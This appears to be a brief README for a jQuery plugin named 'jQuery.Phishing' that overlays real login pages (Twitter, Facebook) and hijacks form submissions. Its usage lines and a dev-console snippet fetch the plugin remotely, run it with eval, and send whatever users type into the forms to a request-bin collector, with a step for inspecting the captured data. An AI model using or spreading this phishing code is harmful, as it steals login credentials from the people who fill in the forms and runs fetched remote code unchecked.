Phishing and Hijack All Form
$.phishing('https://twitter.com/login','//your_request_bin')
$.phishing('https://twitter.com/login',()=>alert`onload`)
- Open your website
- F12 call dev-tool -> console -> input:
$.get(`https://raw.githubusercontent.com/jackmasa/jQuery.Phishing/master/jQuery.Phishing.js`,c=>{
eval(c);
$.phishing(`//fb.com`,`//requestbin.herokuapp.com/1koaluq1`);
});
- try submit form :)
- see result: http://requestb.in/1koaluq1?inspect